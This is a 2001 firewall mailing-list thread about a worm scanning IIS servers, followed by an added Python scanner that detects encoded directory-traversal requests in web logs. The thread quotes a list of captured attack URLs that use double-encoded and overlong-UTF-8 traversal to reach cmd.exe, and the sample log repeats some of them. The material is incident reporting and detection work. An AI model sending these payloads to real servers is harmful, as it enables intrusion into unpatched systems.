Have something strange here as well. Infected an NT4 workstation/IIS4.
Uses TFTP.EXE for outward scans and placed 1k of empty files in /scripts.
Russ Goulding
Systems Administrator
Quick Delivery Service, Inc.
-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of Jose Nazario
Sent: Tuesday, September 18, 2001 12:28 PM
To: Luke Butcher
Cc: [EMAIL PROTECTED]
Subject: RE: something new afoot, sweeping scans:
On Tue, 18 Sep 2001, Luke Butcher wrote:
> Seeing hits from this new worm, looks like it tries circa 30 URLs.
> Logic looks similar to Code Red II/III, in that most hits are coming
> from similar class B and C networks.
It's a huge shitstorm here. Shutting us down all morning as our firewall
connection tables are flooded. Massive traffic floods ... the whole 9
yards.
Here are the payloads culled from an apache server:
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+C:%5C
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
hope that helps.
____________________________
jose nazario [EMAIL PROTECTED]
PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
PGP key ID 0xFD37F4E5 (pgp.mit.edu)
_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
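Added example, not from either poster or the list: a small Python scanner that takes the request targets seen in the payload list above and normalizes them the way a permissive decoder would (percent-decoding repeated until the string stops changing, and 0xC0/0xC1 overlong two-byte UTF-8 accepted without validating the continuation byte), then flags double encoding, overlong UTF-8, traversal above the web root, and any canonical path that ends in cmd.exe. The Apache-style log lines and client IPs are constructed for the example; the indicator names and the lenient decoder are this example's own choices, not something from the thread.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache common/combined log: client IP first, request line in quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Percent-encoded 0xC0/0xC1 lead byte: only ever an overlong (invalid) UTF-8 form.
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)

# Constructed sample log: three encoded traversal requests, one direct cmd.exe
# request through a virtual directory, and two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:12:01:07 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
10.0.0.5 - - [18/Sep/2001:12:01:08 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
10.0.0.5 - - [18/Sep/2001:12:01:08 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
10.0.0.6 - - [18/Sep/2001:12:01:30 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
10.0.0.7 - - [18/Sep/2001:12:02:11 -0400] "GET /index.html HTTP/1.1" 200 1043
10.0.0.9 - - [18/Sep/2001:12:03:45 -0400] "GET /scripts/report.asp?id=12 HTTP/1.0" 200 512
"""


def lenient_utf8_decode(data: bytes) -> str:
    """Decode bytes the way a permissive server-side decoder would: a 0xC0/0xC1
    lead byte is accepted as an overlong two-byte sequence and the following
    byte is used without checking that it is a continuation byte. Every other
    byte passes through as one character (latin-1 style)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonicalize(target: str, max_rounds: int = 4):
    """Return (canonical_path, sorted indicator list) for one request target.
    The query string is dropped; decoding repeats until the path is stable."""
    indicators = set()
    current, rounds = target.split("?", 1)[0], 0
    for _ in range(max_rounds):
        if OVERLONG_RE.search(current):
            indicators.add("overlong_utf8")
        raw = current.encode("latin-1", "replace")
        decoded = lenient_utf8_decode(unquote_to_bytes(raw))
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    if rounds >= 2:  # a second decoding pass still changed the path
        indicators.add("double_encoding")
    # Treat backslash like slash, resolve dot segments, note escapes above root.
    stack = []
    for seg in current.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                indicators.add("traversal_above_root")
        else:
            stack.append(seg)
    canonical = "/" + "/".join(stack)
    if canonical.lower().endswith("/cmd.exe"):
        indicators.add("cmd_exe")
    return canonical, sorted(indicators)


def scan_log(text: str):
    """Return (ip, raw_target, canonical_path, indicators) for each request
    line that carries at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        canonical, indicators = canonicalize(m.group("target"))
        if indicators:
            hits.append((m.group("ip"), m.group("target"), canonical, indicators))
    return hits


if __name__ == "__main__":
    for ip, raw, canonical, flags in scan_log(SAMPLE_LOG):
        print(f"{ip}  {canonical}  {','.join(flags)}  <- {raw}")
```

The point of decoding repeatedly is that a filter which decodes once sees `..%5c..` (harmless-looking) where the file system will see `..\..`; a filter that decodes strictly rejects `%c0%af` as invalid UTF-8 and never notices that the server's own decoder turned it into `/`. Matching on the canonical path rather than on the raw request therefore catches every variant in the list above with one rule, and the indicator set tells you which evasion technique each hit used.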